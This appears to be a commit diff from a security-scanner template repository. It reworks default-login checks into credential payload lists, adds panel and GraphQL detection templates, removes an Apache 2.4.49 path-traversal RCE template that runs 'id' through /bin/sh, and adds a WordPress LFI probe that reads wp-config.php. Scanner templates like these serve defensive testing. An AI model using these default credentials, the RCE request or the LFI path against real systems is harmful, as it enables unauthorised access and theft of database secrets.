httpd;General;lang=en&login_id={{username}}&login_pw={{password}}
payloads:
username:
- root
password:
- sweap12~
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: body
words:
- "document.formParent2.changepasswd1.value"
- "passwd_change.ehp"
part: body
- type: status
status:
- 200

21
default-logins/showdoc/showdoc-default-login.yaml
View File

@ -9,14 +9,21 @@ info:
tags: showdoc,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/server/index.php?s=/api/user/login"
body: |
username=showdoc&password=123456&v_code=
- raw:
- |
POST /server/index.php?s=/api/user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
username={{username}}&password={{password}}&v_code=
payloads:
username:
- showdoc
password:
- 123456
attack: pitchfork
headers:
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
matchers-condition: and
matchers:

22
default-logins/solarwinds/solarwinds-default-login.yaml
View File

@ -12,12 +12,22 @@ info:
# {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337}
requests:
- method: GET
path:
- "{{BaseURL}}/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS" # First path is default base path
- "{{BaseURL}}/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS"
headers:
Authorization: "Basic YWRtaW46"
- raw:
- |
GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username)}}
- |
GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username)}}
payloads:
username:
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: word

9
default-logins/spectracom/spectracom-default-login.yaml
View File

@ -13,7 +13,14 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123
data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D={{username}}&data%5BUser%5D%5Bpassword%5D={{password}}
payloads:
username:
- spadmin
password:
- admin123
attack: pitchfork
matchers-condition: and
matchers:

21
default-logins/szhe/szhe-default-login.yaml
View File

@ -9,13 +9,20 @@ info:
- https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage
requests:
- method: POST
path:
- "{{BaseURL}}/login/"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
email=springbird@qq.com&password=springbird&remeber=true
- raw:
- |
POST /login/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
email={{username}}&password={{password}}&remeber=true
payloads:
username:
- springbird@qq.com
password:
- springbird
attack: pitchfork
matchers-condition: and
matchers:

9
default-logins/vidyo/vidyo-default-login.yaml
View File

@ -24,7 +24,14 @@ requests:
Referer: {{RootURL}}/super/login.html?lang=en
Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en
username=super&password=password
username={{username}}&password={{password}}
payloads:
username:
- super
password:
- password
attack: pitchfork
extractors:
- type: regex

9
default-logins/viewpoint/trilithic-viewpoint-login.yaml
View File

@ -16,7 +16,14 @@ requests:
Content-Type: application/json
Cookie: trilithic_win_auth=false
{u:"admin", t:"undefined", p:"trilithic", d:"", r:false, w:false}
{u:"{{username}}", t:"undefined", p:"{{password}}", d:"", r:false, w:false}
payloads:
username:
- admin
password:
- trilithic
attack: pitchfork
matchers-condition: and
matchers:

17
default-logins/visionhub/visionhub-default-login.yaml
View File

@ -9,11 +9,18 @@ info:
reference: https://www.qognify.com/products/visionhub/
requests:
- method: POST
path:
- '{{BaseURL}}/VisionHubWebApi/api/Login'
headers:
Authorization: Basic YWRtaW46YWRtaW4=
- raw:
- |
POST /VisionHubWebApi/api/Login HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:

9
default-logins/wifisky/wifisky-default-login.yaml
View File

@ -16,7 +16,14 @@ requests:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
username=admin&password=admin
username={{username}}&password={{password}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:

9
default-logins/wso2/wso2-default-login.yaml
View File

@ -14,7 +14,14 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=admin
username={{username}}&password={{password}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
redirects: false
matchers:

9
default-logins/xxljob/xxljob-default-login.yaml
View File

@ -14,7 +14,14 @@ requests:
Host:{{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
userName=admin&password=123456
userName={{username}}&password={{password}}
payloads:
username:
- admin
password:
- 123456
attack: pitchfork
matchers-condition: and
matchers:

23
default-logins/zabbix/zabbix-default-login.yaml
View File

@ -7,14 +7,21 @@ info:
tags: zabbix,default-login
requests:
- method: POST
path:
- '{{BaseURL}}/index.php'
headers:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
name={{username}}&password={{password}}&autologin=1&enter=Sign+in
payloads:
username:
- Admin
password:
- zabbix
attack: pitchfork
matchers-condition: and
matchers:
@ -24,4 +31,4 @@ requests:
- type: status
status:
- 302
- 302

21
default-logins/zmanda/zmanda-default-login.yaml
View File

@ -9,14 +9,21 @@ info:
tags: zmanda,default-login
requests:
- method: POST
path:
- '{{BaseURL}}/ZMC_Admin_Login'
headers:
Content-Type: application/x-www-form-urlencoded
Cookie: zmc_cookies_enabled=true
- raw:
- |
POST /ZMC_Admin_Login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: zmc_cookies_enabled=true
body: login=AEE&last_page=&username=admin&password=admin&submit=Login&JS_SWITCH=JS_ON
login=AEE&last_page=&username={{username}}&password={{password}}&submit=Login&JS_SWITCH=JS_ON
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:

34
exposed-panels/adiscon-loganalyzer.yaml Normal file
View File

@ -0,0 +1,34 @@
id: adiscon-loganalyzer
info:
name: Detect exposed Adiscon LogAnalyzer
author: geeknik
severity: high
description: Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing, analysis of realtime network events and reporting services.
reference: https://loganalyzer.adiscon.com/
tags: adiscon,loganalyzer,syslog,exposures
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Adiscon LogAnalyzer'
- 'value="SYSLOG"'
- 'value="EVTRPT"'
- 'value="WEBLOG"'
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- 'text/html'

27
exposed-panels/hpe-system-management-login.yaml Normal file
View File

@ -0,0 +1,27 @@
id: hpe-system-management-login
info:
name: HPE System Management Login
author: divya_mudgal
severity: info
tags: hp,tech,panel
requests:
- method: GET
path:
- "{{BaseURL}}/cpqlogin.htm"
matchers-condition: and
matchers:
- type: word
condition: and
part: body
words:
- "HPE System Management Homepage"
- "/proxy/ssllogin"
extractors:
- type: regex
part: body
regex:
- "HPE System Management Homepage v([0-9-.]*)"

26
exposed-panels/lansweeper-login.yaml Normal file
View File

@ -0,0 +1,26 @@
id: lansweeper-login
info:
name: Lansweeper Login
author: divya_mudgal
severity: info
tags: lansweeper,tech,panel
requests:
- method: GET
path:
- "{{BaseURL}}/login.aspx"
- "{{BaseURL}}/favicon.ico"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
name: login
words:
- "Lansweeper - Login"
- type: dsl
name: favicon
dsl:
- "status_code==200 && (\"1847799946\" == mmh3(base64_py(body)))"

17
file/electron/electron-version-detect.yaml Normal file
View File

@ -0,0 +1,17 @@
id: electron-version-detect.yaml
info:
name: Electron Version Detect
author: me9187
severity: info
tags: electron,file
reference: https://www.electronjs.org/blog/chromium-rce-vulnerability/
file:
- extensions:
- json
extractors:
- type: regex
regex:
- '"electronVersion":"[^"]*"'

17
misconfiguration/unauthenticated-lansweeper.yaml Normal file
View File

@ -0,0 +1,17 @@
id: unauthenticated-lansweeper
info:
name: Unauthenticated Lansweeper Instance
author: divya_mudgal
severity: high
tags: lansweeper,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/Default.aspx"
matchers:
- type: word
words:
- "Main page - Lansweeper"

153
technologies/graphql-detect.yaml
View File

@ -2,51 +2,136 @@ id: graphql-detect
info:
name: GraphQL API Detection
author: NkxxkN,ELSFA7110
author: NkxxkN,ELSFA7110,@OFJAAAH
severity: info
tags: tech,graphql
tags: tech,graphql,fuzz
requests:
- method: POST
path:
- "{{BaseURL}}/graphql"
- "{{BaseURL}}/HyperGraphQL"
- "{{BaseURL}}/___graphql"
- "{{BaseURL}}/altair"
- "{{BaseURL}}/api/cask/graphql-playground"
- "{{BaseURL}}/api/graphql"
- "{{BaseURL}}/api/graphql/v1"
- "{{BaseURL}}/explorer"
- "{{BaseURL}}/express-graphql"
- "{{BaseURL}}/graph"
- "{{BaseURL}}/graph_cms"
- "{{BaseURL}}/graphiql"
- "{{BaseURL}}/graphiql.css"
- "{{BaseURL}}/graphiql.js"
- "{{BaseURL}}/graphiql.min.css"
- "{{BaseURL}}/graphiql.min.js"
- "{{BaseURL}}/graphiql.php"
- "{{BaseURL}}/graphiql/finland"
- "{{BaseURL}}/graphql"
- "{{BaseURL}}/graphql-console"
- "{{BaseURL}}/graphql-devtools"
- "{{BaseURL}}/graphql-explorer"
- "{{BaseURL}}/graphql-playground"
- "{{BaseURL}}/graphql-playground-html"
- "{{BaseURL}}/graphql.php"
- "{{BaseURL}}/graphql/console"
- "{{BaseURL}}/v1"
- "{{BaseURL}}/v2"
- "{{BaseURL}}/v3"
- "{{BaseURL}}/graphql-console"
- "{{BaseURL}}/graphql/graphql-playground"
- "{{BaseURL}}/graphql/schema.json"
- "{{BaseURL}}/graphql/schema.xml"
- "{{BaseURL}}/graphql/schema.yaml"
- "{{BaseURL}}/graphql/v1"
- "{{BaseURL}}/je/graphql"
- "{{BaseURL}}/laravel-graphql-playground"
- "{{BaseURL}}/playground"
- "{{BaseURL}}/portal-graphql"
- "{{BaseURL}}/query"
- "{{BaseURL}}/query-api"
- "{{BaseURL}}/query-explorer"
- "{{BaseURL}}/query-laravel"
- "{{BaseURL}}/v3/subscriptions"
- "{{BaseURL}}/sphinx-graphiql"
- "{{BaseURL}}/subscriptions"
- "{{BaseURL}}/v1"
- "{{BaseURL}}/v1/altair"
- "{{BaseURL}}/v1/api/graphql"
- "{{BaseURL}}/v1/explorer"
- "{{BaseURL}}/v1/graph"
- "{{BaseURL}}/v1/graphiql"
- "{{BaseURL}}/v1/graphiql.css"
- "{{BaseURL}}/v1/graphiql.js"
- "{{BaseURL}}/v1/graphiql.min.css"
- "{{BaseURL}}/v1/graphiql.min.js"
- "{{BaseURL}}/v1/graphiql.php"
- "{{BaseURL}}/v1/graphiql/finland"
- "{{BaseURL}}/v1/graphql"
- "{{BaseURL}}/v1/graphql-explorer"
- "{{BaseURL}}/v1/graphql.php"
- "{{BaseURL}}/v1/graphql/console"
- "{{BaseURL}}/v1/graphql/schema.json"
- "{{BaseURL}}/v1/graphql/schema.xml"
- "{{BaseURL}}/v1/graphql/schema.yaml"
- "{{BaseURL}}/v1/playground"
- "{{BaseURL}}/v1/subscriptions"
- "{{BaseURL}}/v2"
- "{{BaseURL}}/v2/altair"
- "{{BaseURL}}/v2/api/graphql"
- "{{BaseURL}}/v2/explorer"
- "{{BaseURL}}/v2/graph"
- "{{BaseURL}}/v2/graphiql"
- "{{BaseURL}}/v2/graphiql.css"
- "{{BaseURL}}/v2/graphiql.js"
- "{{BaseURL}}/v2/graphiql.min.css"
- "{{BaseURL}}/v2/graphiql.min.js"
- "{{BaseURL}}/v2/graphiql.php"
- "{{BaseURL}}/v2/graphiql/finland"
- "{{BaseURL}}/v2/graphql"
- "{{BaseURL}}/v2/graphql-explorer"
- "{{BaseURL}}/v2/graphql.php"
- "{{BaseURL}}/v2/graphql/console"
- "{{BaseURL}}/v2/graphql/schema.json"
- "{{BaseURL}}/v2/graphql/schema.xml"
- "{{BaseURL}}/v2/graphql/schema.yaml"
- "{{BaseURL}}/v2/playground"
- "{{BaseURL}}/v2/subscriptions"
- "{{BaseURL}}/v3"
- "{{BaseURL}}/v3/altair"
- "{{BaseURL}}/v3/api/graphql"
- "{{BaseURL}}/v3/explorer"
- "{{BaseURL}}/v3/graph"
- "{{BaseURL}}/v3/graphiql"
- "{{BaseURL}}/v3/graphiql.css"
- "{{BaseURL}}/v3/graphiql.js"
- "{{BaseURL}}/v3/graphiql.min.css"
- "{{BaseURL}}/v3/graphiql.min.js"
- "{{BaseURL}}/v3/graphiql.php"
- "{{BaseURL}}/v3/graphiql/finland"
- "{{BaseURL}}/v3/graphql"
- "{{BaseURL}}/v3/graphql-explorer"
- "{{BaseURL}}/v3/graphql.php"
- "{{BaseURL}}/v3/graphql/console"
- "{{BaseURL}}/v3/graphql/schema.json"
- "{{BaseURL}}/v3/graphql/schema.xml"
- "{{BaseURL}}/v3/graphql/schema.yaml"
- "{{BaseURL}}/v3/playground"
- "{{BaseURL}}/v3/graphql/schema.json"
- "{{BaseURL}}/graphql/schema.yaml"
- "{{BaseURL}}/graphql/schema.xml"
- "{{BaseURL}}/graphql/schema.json"
- "{{BaseURL}}/graphiql/finland"
- "{{BaseURL}}/graphiql.css"
- "{{BaseURL}}/graphql-devtools"
- "{{BaseURL}}/graphql/v1"
- "{{BaseURL}}/v1/graphql"
- "{{BaseURL}}/api/graphql/v1"
- "{{BaseURL}}/portal-graphql"
- "{{BaseURL}}/graphql-playground"
- "{{BaseURL}}/laravel-graphql-playground"
- "{{BaseURL}}/query-explorer"
- "{{BaseURL}}/sphinx-graphiql"
- "{{BaseURL}}/express-graphql"
- "{{BaseURL}}/query"
- "{{BaseURL}}/HyperGraphQL"
- "{{BaseURL}}/graphql/graphql-playground"
- "{{BaseURL}}/graphql-playground-html"
- "{{BaseURL}}/graph_cms"
- "{{BaseURL}}/query-api"
- "{{BaseURL}}/api/cask/graphql-playground"
- "{{BaseURL}}/altair"
- "{{BaseURL}}/playground"
- "{{BaseURL}}/v3/subscriptions"
- "{{BaseURL}}/v4/altair"
- "{{BaseURL}}/v4/api/graphql"
- "{{BaseURL}}/v4/explorer"
- "{{BaseURL}}/v4/graph"
- "{{BaseURL}}/v4/graphiql"
- "{{BaseURL}}/v4/graphiql.css"
- "{{BaseURL}}/v4/graphiql.js"
- "{{BaseURL}}/v4/graphiql.min.css"
- "{{BaseURL}}/v4/graphiql.min.js"
- "{{BaseURL}}/v4/graphiql.php"
- "{{BaseURL}}/v4/graphiql/finland"
- "{{BaseURL}}/v4/graphql"
- "{{BaseURL}}/v4/graphql-explorer"
- "{{BaseURL}}/v4/graphql.php"
- "{{BaseURL}}/v4/graphql/console"
- "{{BaseURL}}/v4/graphql/schema.json"
- "{{BaseURL}}/v4/graphql/schema.xml"
- "{{BaseURL}}/v4/graphql/schema.yaml"
- "{{BaseURL}}/v4/playground"
- "{{BaseURL}}/v4/subscriptions"
headers:
Content-Type: application/json
@ -65,4 +150,4 @@ requests:
- "__schema"
- "(Introspection|INTROSPECTION|introspection).*?"
- ".*?operation not found.*?"
condition: or
condition: or

41
vulnerabilities/apache/apache-httpd-rce.yaml
View File

@ -1,41 +0,0 @@
id: apache-httpd-rce
info:
name: Apache HTTPd - 2.4.49 (CGI enabled) RCE
author: pdteam
severity: critical
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by require all denied these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
reference:
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
- https://twitter.com/ptswarm/status/1445376079548624899
- https://github.com/blasty/CVE-2021-41773
tags: cve,cve2021,rce,apache
requests:
- raw:
- |
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
echo Content-Type: text/plain; echo; id
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
condition: and
part: body
words:
- 'uid='
- 'gid='
- 'groups='
extractors:
- type: regex
regex:
- "(u|g)id=.*"

29
vulnerabilities/wordpress/advanced-access-manager-lfi.yaml Normal file
View File

@ -0,0 +1,29 @@
id: advanced-access-manager-lfi
info:
name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion
author: 0x_Akoko
severity: high
description: The Advanced Access Manager WordPress plugin, versions before 5.9.9, allowed reading arbitrary files. This way one can download the wp-config.php file and get access to the database, which is publicly reachable on many servers.
reference:
- https://wpscan.com/vulnerability/9873
- https://id.wordpress.org/plugins/advanced-access-manager/
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/?aam-media=wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200